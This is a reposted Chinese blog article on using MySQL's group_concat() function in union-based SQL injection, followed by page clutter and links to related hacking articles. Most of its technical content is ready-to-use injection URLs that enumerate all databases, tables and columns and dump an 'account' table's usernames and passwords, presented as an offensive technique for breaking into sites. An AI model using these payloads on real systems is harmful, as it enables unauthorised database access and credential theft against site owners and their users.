对Group_concaT函数利用剖析 (转)

最新推荐文章于 2021-04-06 06:00:37 发布
最新推荐文章于 2021-04-06 06:00:37 发布
阅读量99 收藏
点赞数
原文链接:http://www.cnblogs.com/demonspider/archive/2012/08/01/2618840.html
版权

作者:晓华 

 

                                                                                            开篇介绍

      在FLYH4T大哥的“Mysql5注射技巧总结”一文中介绍了通过使用“information_schema”库实现遍历猜解库名表名以及字段名的技术,解决了一些以前使用工具无法猜解到的库名表名以及字段名的问题,提高了注射的效率。关于此文的详细技术细节请参考往期的“黑客手册”。但是通过我的研究,发现这种技巧有一定的缺陷。首先遍历的库名或者表名以及字段名等位置,要使用到limit功能语句来强制返回select查询的记录数。如果在渗透中limit功能语句无法使用,是不是很难进行遍历了?如果被限制的话,可以使用“!=”来绕过。语句使用格式:

show.php?id=2/**/and/**/1=2/**/union/**/select/**/1,table_name,3,4,5,6,7,8,9,10/**/frominformation_schema.tables/**/where/**/table_schema=database()/**/and/**/table_name/**/!=char(97,100,109,105,110)

虽然这样能够绕过limit的限制,但是利用起来非常不方便,而且猜解的速度很慢。经过我的仔细研究,找到了一个相对比较好的方法。而且解决了limit被限制的问题,更重要的是加速了遍历的速度,明显提高注射的效率。

                                                                 group_concat()函数介绍

 

首先我们来了解一下group_concat()函数,该函数完整语法如下:

GROUP_CONCAT([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]]
[SEPARATOR str_val])

该函数返回一个字符串结果,该结果由分组中的值连接组合而成,这个函数在 MySQL 4.1 中被加入。有兴趣的朋友可以参考“MYSQL5.1参考手册”。

 

普通利用

 

该函数在MYSQL的注射中也有使用的例子,利用方法还只是局限于在一个地方显示一些普通信息,比如显示数据库版本和爆字段数据等。爆版本等信息,执行语句:

news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15—如图1

 

 

 

 

爆用户名以及密码等字段信息,执行语句:

news.php?id=-1/**/union/**/select/**/1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12/**/from/**/admin—

这么强悍的函数,我们为什么不深度挖掘它的功能呢?利用它可以干一些不可思议的事,接下来我会介绍如何深度利用这个函数,读者朋友可要仔细了。

 

高级利用

爆全部库名

利用这个函数可以爆出全部的数据库名,构造查询语句:

news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(SCHEMA_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.SCHEMATA--   如图2

 

爆出了所有的数据库名,共有三个。依次为: information_schema cite test

 

爆全部表名

利用这个函数可以爆出全部的表名,如果想爆出cite库的全部表名。构造查询语句:

news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.tables/**/where/**/table_schema=0x63697465 其中0x63697465是cite的HEX值。如图3

 

 

如果只是想爆当前库的全部表名,我们不需要将库名进行HEX值转换。可以这样执行语句:

news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.tables/**/where/**/table_schema=database()-- 其中database()函数就是显示当前库的信息。如图4

 

爆全部字段名

 

利用这个函数可以爆出全部的字段名,如果想爆出“account”表的全部字段,首先将其进行HEX转换。构造查询语句:

news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.columns/**/where/**/table_name=0x6163636F756E74-- 如图5

 

得到二个敏感的字段,依次为:username password

 

爆最终敏感数据

 

有了表和字段等关键信息,我们就可以爆出敏感数据信息。构造查询语句:

news.php?category=seminar&id=-291/**/union/**/select/**/1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/cite.account-- 如图6

 

总结:灵活运用此函数,能让你充分感受到MYSQL注射的快感。其实也不是什么高深的技术,只不过是将MYSQL5的“information_schema”库与group_concat()函数的综合运用罢了。对本文有任何疑问和有好的建议的朋友,请到黑客手册官方论坛或者岁月联盟找我交换意见,谢谢。

转载于:https://www.cnblogs.com/demonspider/archive/2012/08/01/2618840.html

weixin_30484739
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql5注射技巧总结
cnbird's blog
01-22 641
flyh4t@126.com文章已经发表在《黑客手册》,载请署名版权Mysql5和之前的版本有很多不同的地方,灵活的运用其特性可以在入侵的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没有写清楚的部分表达出来,你看明白这个文章后也许你会发现,原来mysql5也可以像mssql一样注射。一、原理分析我们先看看mysql5比之前增加的系统数据库information_schema的结构,
mysql 注入检测服务_检测周杰伦官方网站 mysql5注入
weixin_35976688的博客
01-20 114
文章作者:Flyh4t[脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本文已经发表在《***手册》,载请署名版权某日在群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。看注射点,老规矩,先提交个单引号,返回如图1错误提示是You have an err...
Dedecms getip()的漏洞利用
weixin_34248849的博客
03-31 134
flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell: 在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.phpfunction FushCache($mid=0){if(empty(...
jieqi(杰奇)cms v1.6 php代码执行0day漏洞,Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
weixin_39935092的博客
04-06 257
print_r('+---------------------------------------------------------------------------+Jieqi CMS V1.6 PHP Code Injection Exploitby flyh4tmail: phpsec at hotmail dot comteam: http://www.wolvez.org+-----...
织梦dedecms5.5爆最新漏洞,可得到webshell
weixin_33788244的博客
12-03 557
影响版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考 by:Flyh4t*...
小步快跑,快速迭代:安全运营的器术法道
Tencent_SRC的博客
08-12 7121
作者 | 腾讯安全平台部 lake2在进行安全体系建设工作的时候,人们往往容易看到的成果是新研发了一个安全系统,采用了一个新的技术,似乎做出一个系统采用一种技术就可以一劳永逸地解决某类问...
马克斯cmsphp,马克斯CMS2.0beta (maxcms)管理员认证绕过漏洞
weixin_42511517的博客
03-26 488
<?phpprint_r('+---------------------------------------------------------------------------+maxcms2.0 creat new admin exploitby Flyh4tteam:wolvez security teamsite:bbs.wolvez.orgdork:salemax#qq.com+...
检测周杰伦官方网站 (鬼仔 )
jahn的专栏
10-02 642
文章作者:Flyh4t[脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本文已经发表在《黑客手册》,载请署名版权某日在群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。看注射点,老规矩,先提交个单引号,返回如图1错误提示是You have an er
风讯CMS4.0sp5 商业版的致命伤
HackCode的专栏
07-26 719
 文章作者:oldjun&flyh4t[ 脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)注意:文章已经发表在《黑客手册》后由作者友情提交到邪恶八进制信息安全团队技术论坛,载请注明出处  FooSunCMS(风讯网站管理系统)是由四川风讯科技发展有限公司自主编写的一套ASP+ACCESS/MSSQL的内容管理系统程序,FoosunCMS已形成内容管理系统整站解
php base64_decode的一个知识点
weixin_33743703的博客
12-17 130
Flyh4t 的某篇老文上知道的: 在字符串不包括 + \ =等特殊符号的情况下,base64_decode的参数是无须使用单引号或者双引号的 base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4x); <?php @eval($_POST[a]); ?>1 载于:https://blo...
传感器驱动+imx296驱动+Linux驱动
08-10
传感器驱动+imx296驱动+Linux驱动
ASP校园论坛的设计与实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
Unity课程设计报告书PDF
08-10
1.技术需求: 此游戏是在Unity5.3.3上开发出来的,Unity5.3.3可以支持2D、3D场景 的编辑,本游戏是基于3D场景开发的。游戏中的脚本语言使用的是C#, Unity5.3.3中的Monodevelop为脚本编辑提供了平台。 2.功能需求: Flappy Bird 是一款益智类的小游戏,其玩法为:游戏开始后,玩家需间歇 性的点击鼠标,让小鸟向上飞,不会掉下来,并且要穿过随机出现的管道的间隙, 不能碰到管道,碰到就游戏结束,穿过一个管道就可以得到一分。其制作包括对 以下六大功能的需求: (1)当开始游戏后,玩家需要单击指定位置才能开始游戏,否则无法开始: (2)需要通过点击屏幕来控制小鸟的位置,完成使小鸟上下移动的功能: (3)需要对小鸟是否碰到地面或者管道进行判断,从而决定游戏是否结束: (4)需要设置触发器以实现场景的延续,当小鸟碰到触发器,场景中的第一幅 背景便挪到最后一幅的后面,从而实现视觉上场景不断出现的效果: (5)需要对玩家进行记分,并对最高分进行判断和存储: (6)在失败后,需要使玩家通过点击按钮重新开始游戏。
毕业设计,基于ASP+ACCESS开发的民航售票管理系统,内含完整源代码,数据库,毕业论文
08-10
毕业设计,基于ASP+ACCESS开发的民航售票管理系统,内含完整源代码,数据库,毕业论文 随着计算机及网络技术的飞速发展,Internet/Intranet应用在全球范围内日益普及,当今社会正快速向信息化社会前进,信息自动化的作用也越来越大。 从而使我们从繁杂的事务中解放出来,提高了我们的工作效率。 本论文主要阐述一个功能比较强大的企业网站系统的后台操作过程及一些关键技术。该系统信息来源主要由用户直接添加,通过管理员审核后,在网站上发布出来,以供大家查询相关公司信息。本系统主要让社会各界能更好的了解本本企业,欢迎对本企业的发展提出更多宝贵留言。该企业网站系统是前台应用Dreamweaver MX、FireworksMX、Flash MX等软件,后台结合ASP编程技术和Access数据库技术开发出来的。 关键词:用户管理;信息发布;ASP;企业网站
Kubernetes指南+Kubernetes安装全流程,让你彻底学会Kubernetes
08-10
Kubernetes指南+Kubernetes安装全流程,让你彻底学会Kubernetes
ASP+ACCESS在线考试系统设计(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
Hadoop HA高可用手把手部署搭建文档
最新发布
08-10
这是我整理出来的Hadoop HA高可用手把手部署搭建文档
stripe支付demo
08-10
Stripe是由20多岁的两兄弟Patrick Collison和John Collison创办的Stripe为公司提供网上支付的解决方案。Stripe向服务的公司收取每笔交易的2.9%加上30美分的手续费。
对于广度优先搜索的模板
08-10
广度优先搜索(bfs)是c++基础内容之一非常重要。对于一棵树,bfs通过每一步的枚举能枚举出最佳结果 可以练习的题目: [NOIP2002 提高组] 字串变换 [NOI2013] 树的计数 [USACO2.1] 健康的荷斯坦奶牛 Healthy Holsteins [NOIP2010 提高组] 引水入城 [USACO07FEB] Lilypad Pond G [USACO07OCT] Obstacle Course S
sql语句的group_concat()函数
10-11
group_concat()函数是一种聚合函数,用于将多行数据按照指定的顺序合并成一个字符串。它常用于将某个字段的多个值合并成一个字符串,以便于查询和分析。 例如,我们有一个表格students,其中包含学生的姓名和所选课程: | name | course | |-------|--------| | Alice | Math | | Alice | English| | Bob | Math | | Bob | Physics| | Bob | History| 如果我们想要按照学生姓名将所选课程合并成一个字符串,可以使用以下SQL语句: ``` SELECT name, GROUP_CONCAT(course SEPARATOR ',') AS courses FROM students GROUP BY name; ``` 执行结果如下: | name | courses | |-------|---------------------| | Alice | Math,English | | Bob | Math,Physics,History|
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值